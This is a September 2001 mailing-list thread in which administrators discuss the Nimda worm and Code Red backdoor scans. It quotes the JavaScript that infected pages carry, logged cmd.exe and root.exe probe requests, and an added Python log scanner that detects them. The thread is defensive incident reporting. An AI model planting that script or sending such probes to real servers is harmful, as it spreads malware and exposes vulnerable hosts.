Looks like a new virus called "W32.Nimda.A@mm", a variant on the proof-of-concept
Code Blue worm.

This virus has a two-pronged attack, one via e-mail and one via the Unicode Web
Traversal exploit.

"the worm sends out probes to IIS servers attempting to spread by using the
Unicode Web Traversal exploit similar to W32.BlueCode.Worm. Compromised
servers may display a web page prompting a visitor to download an Outlook
file which contains the worm as an attachment." - Symantec
http://securityresponse.symantec.com/avcenter/venc/data/w32.bluecode.worm.html


Very little is known about the new W32.Nimda.A@mm virus.  Here is what I see.


If infected your webserver will include this text at the bottom of the home
page:

<html><script language="JavaScript">
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
</script></html>
<html><script language="JavaScript">
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
</script></html>

This JS will prompt you to download a file by the name of readme.eml which
contains the worm as an attachment.

This is all I know now....

Mark W. Breneman
-Cold Fusion Developer
-Network Administrator
  Vivid Media
  [EMAIL PROTECTED]
  www.vividmedia.com
  608.270.9770
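An added example, not from Mark's message or from Symantec, of how a defender would check for the probes and the page marker this thread describes: it scans constructed IIS-style log lines for the root.exe and cmd.exe requests quoted in the thread and tests a fetched home page for the readme.eml script. The log field layout, the sample entries and the 192.0.2.x client addresses are assumptions.

```python
import re
from urllib.parse import unquote

# Signatures taken from the probes quoted in this thread, matched against the
# percent-decoded, lower-cased request path.
PROBE_SIGNATURES = {
    "cmd.exe reachable through the web server": re.compile(r"(^|/)winnt/system32/cmd\.exe"),
    "Code Red II root.exe backdoor": re.compile(r"(^|/)scripts/root\.exe"),
    "directory traversal in path": re.compile(r"(^|/)\.\.(/|$)"),
}
# The JavaScript Nimda appends to an infected server's pages (quoted above).
INJECTION_MARKER = re.compile(r'window\.open\(\s*"readme\.eml"', re.IGNORECASE)

# Constructed sample log, not real traffic. Assumed IIS-style fields:
# date time c-ip method uri-stem uri-query status
SAMPLE_LOG = """\
2001-09-18 09:25:55 192.0.2.181 GET /scripts/root.exe /c+dir 200
2001-09-18 09:25:56 192.0.2.181 GET /c/winnt/system32/cmd.exe /c+dir 404
2001-09-18 09:25:57 192.0.2.181 GET /scripts/%2e%2e/winnt/system32/cmd.exe /c+dir 200
2001-09-18 09:26:01 192.0.2.50 GET /index.cfm - 200
"""
LOG_FIELDS = ("date", "time", "client", "method", "path", "query", "status")

def classify_request(path: str) -> list:
    """Names of every probe signature the path matches. Double-decoding and
    folding backslashes normalises ordinary encodings; unquote() does not
    mimic IIS's overlong-UTF-8 decoding, so the file-name signatures carry."""
    decoded = unquote(unquote(path)).lower().replace("\\", "/")
    return [name for name, rx in PROBE_SIGNATURES.items() if rx.search(decoded)]

def parse_log(text: str) -> list:
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == len(LOG_FIELDS) and not line.startswith("#"):
            rows.append(dict(zip(LOG_FIELDS, parts)))
    return rows

def scan_log(text: str) -> list:
    """One alert per probe; 'vulnerable' is Dave's point: a 200 to a probe
    means cmd.exe really ran, not merely that the host was scanned."""
    alerts = []
    for row in parse_log(text):
        hits = classify_request(row["path"])
        if hits:
            alerts.append({"client": row["client"], "path": row["path"],
                           "signatures": hits, "vulnerable": row["status"] == "200"})
    return alerts

def page_is_defaced(html: str) -> bool:
    """True when a fetched home page carries the readme.eml window.open call."""
    return INJECTION_MARKER.search(html) is not None
```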


-----Original Message-----
From: webmaster [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 10:31 AM
To: CF-Talk
Subject: Re: Code Red backdoor triggered?


we're seeing a HUGE number of hits all containing:
port=3641 probes and URL=/c/winnt/system32/cmd.exe attempts, and guess where
they're coming from?
The exact same machines that routinely have been doing the Code Red thing.

Damn




----- Original Message -----
From: "Paris Lundis" <[EMAIL PROTECTED]>
To: "CF-Talk" <[EMAIL PROTECTED]>
Sent: Tuesday, September 18, 2001 8:02 AM
Subject: RE: Code Red backdoor triggered?


> Uggh! not the code-red variations again...
>
> Can you tell us Rich if it is impacting the servers ?? Are  you
> patched, and does this thing use something new or is it the same
> exploit as before...
>
> Seems like it is becoming a net-30 terror :)
>
> -paris
> [finding the future in the past, passing the future in the present]
> [connecting people, places and things]
>
>
> -----Original Message-----
> From: Rich Wild <[EMAIL PROTECTED]>
> Date: Tue, 18 Sep 2001 15:37:13 +0100
> Subject: RE: Code Red backdoor triggered?
>
> > even we're getting hammered with syn flood attacks.
> >
> > Rich Wild
> >
> > > -----Original Message-----
> > > From: Dave Watts [mailto:[EMAIL PROTECTED]]
> > > Sent: 18 September 2001 15:52
> > > To: CF-Talk
> > > Subject: FW: Code Red backdoor triggered?
> > >
> > >
> > > It seems there may be some unusual network activity today
> > > worth noting.
> > >
> > > Dave Watts, CTO, Fig Leaf Software
> > > http://www.figleaf.com/
> > > voice: (202) 797-5496
> > > fax: (202) 797-5444
> > >
> > >
> > > -----Original Message-----
> > > From: Dave Watts [mailto:[EMAIL PROTECTED]]
> > > Sent: Tuesday, 18 September, 2001 10:49
> > > To: [EMAIL PROTECTED]
> > > Subject: RE: Code Red backdoor triggered?
> > >
> > >
> > > > Heads up. Pay attention to your servers today. I just
> > > > started detecting a *ton* of these requests. I think it's
> > > > a follow-up worm programmed to take advantage of the
> > > > backdoors Code Red dropped on infected computers. Maybe a
> > > > Code Red III?
> > > >
> > > > -Cameron
> > > >
> > > > [09/18/2001 09:25:55.136 GMT-0400] Connection:
> > > > dhcp181.onewebsystems.com
> > > > (130.205.102.181) on port 80 (tcp).
> > > > [09/18/2001 09:25:55.166 GMT-0400] GET
> > > > /scripts/root.exe?/c+dir HTTP/1.0
> > > > Host: www
> > > > Connnection: close
> > >
> > > After a more careful reading, I don't think this is an attack
> > > at all. I
> > > think it's worse than an attack.
> > >
> > > The GET request doesn't do anything except run the DOS dir
> > > command using the
> > > command processor. But, if a server responds with an HTTP 200
> > > status code,
> > > this indicates that the server is vulnerable to running
> > > cmd.exe through the
> > > web server.
> > >
> > > So, my guess is that this is a vulnerability scan. Once a
> > > list of vulnerable
> > > servers is compiled, a real attack would take much less time
> > > than a Code
> > > Red-style attack, since you could build the list of
> > > vulnerable servers into
> > > the attack code!
> > >
> > > This idea has been discussed a bit in the last month or so -
> > > it's called a
> > > "Warhol" worm, the idea being that an attack might cover the mass
> > > of vulnerable machines in fifteen minutes. Here's a URL to the
> > > article:
> > >
> > > http://hacktivism.openflows.org/article.pl?sid=01/08/13/1237245&mode=nocomment&threshold=
> >
> > Dave Watts, CTO, Fig Leaf Software
> > http://www.figleaf.com/
> > voice: (202) 797-5496
> > fax: (202) 797-5444
> >
>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists
